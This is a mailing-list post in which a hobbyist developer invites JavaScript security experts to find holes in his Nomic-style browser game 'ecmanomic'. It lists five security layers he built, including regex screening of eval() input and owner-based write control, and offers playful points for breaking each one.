[OT] A game that may interest javascript security buffs
abliss
I apologize for being a little off-topic, since this isn't directly
caja-related, but I didn't know where else to look for the world's
greatest
javascript security experts.
I've hacked together a little javascript game called
"ecmanomic" (played in
the browser at http://ecmanomic.org ). I think it may interest some
of you
and I'm eager to hear your feedback on it. Ecmanomic is inspired by
Peter
Suber's game of Nomic, where each play of the game changes the rules
of the
game. There's a google group (cc'd) and a google code project as
well, both
called "ecmanomic".
(This was a learning project for me since I didn't know anything about
javascript at the beginning. So please excuse the terrible style and
all
the egregious mistakes I've no-doubt made.)
Suber's Nomic was designed to model the legislative process, where
there
are layers of "security" that enforce a kind of self-paternalism.
Similarly, in ecmanomic there are several layers of security that I've
tried to implement in (almost) pure javascript. I'd like to know if
any of
you see a way to violate any of these layers.
1. The entire game is stored in a javascript object, serialized in a
slightly-modified JSON. The game allows players to change the game
object, but only in specific ways: e.g. proposing an amendment,
voting
on existing amendments, and activating an amendment with sufficient
positive votes. Can you use these basic interactions to pervert
the
game object itself (for example, changing your player's score to
100)?
(I'll give you 100 metaphorical points if you can.)
2. The game also has a small hosted database. I added this at the
last
minute so that it can maintain libraries of code which aren't part
of
the game proper (and thus don't slow down the page load). The
database
is stored in JSON flat files on a linux filesystem. The small
bootstrap
perl-script which is responsible for running the server-side JS
also
provides the game access to the files. However, the bootstrap
script
has no security; I've attempted to layer on some security from
within
the javascript game. Can you can subvert this security to gain
unfettered read or write access to the database? (25 points for
read,
50 points for write. If you could write, you could execute
arbitrary
code in the player's browser, but not in the serverside game;
however
this would be enough for dastardly deeds.)
3. Within the game of ecmanomic I've implemented a few little
subgames.
All of these involve eval() statements, as a test of how robust I
could
make the security. In the first game, CodeWriter, you submit a
snippet
of code which must evaluate to a function. Before evaluating your
code,
I pass it through some regexps looking for unsafe patterns. If
your
code is OK, your function enters the game arena and competes
against
other functions. Can you subvert this game and force yourself to
win?
(1 point if you can. Also 1 point each round you can come up with
the
cleverest function!)
4. Another subgame, much more ambitious, is called "Moo". In this
game I
allow persistence of user-created data and code, including a
bastardized
version of prototypical inheritance, and I allow users to interact
with
each others' objects and functions. The objects have "owner"
fields
that should restrict write-access. 1 point for you if you can
change
someone else's object without their permission. Also, to prevent
DOS-style bloat attacks, each user has a limited budget of bytes to
add
to the game; the budget can only be refilled by another player who
is
impressed by your work. Half a point for anyone who can find a way
circumvent this, but please don't demonstrate by filling the game
up
with spam!
5. Within the Moo subgame, there's yet another layer of security. I
tried
to create an in-subgame non-scarce currency called "props". The
idea is
that I can "depute" certain objects by name; these objects are
authorized to give props on my behalf. There's an example in the
Avatar
lobby: a graffiti wall which will give you one props from me if you
write on it. 0.5 points if you can violate this currency model,
e.g. get more than 1 props from me or remove someone else's props.
Anyway, if you feel inclined to take a look at the game in your
copious
free time, I'd love to hear what you think of it, either here or on
the
ecmanomic newsgroup. All criticism will be graciously accepted! (I
already know that the user interface is not very good, but one beauty
of
the game is that any player can improve the interface for everyone, so
feel
free to jump in and help out!)
Cheers,
--Adam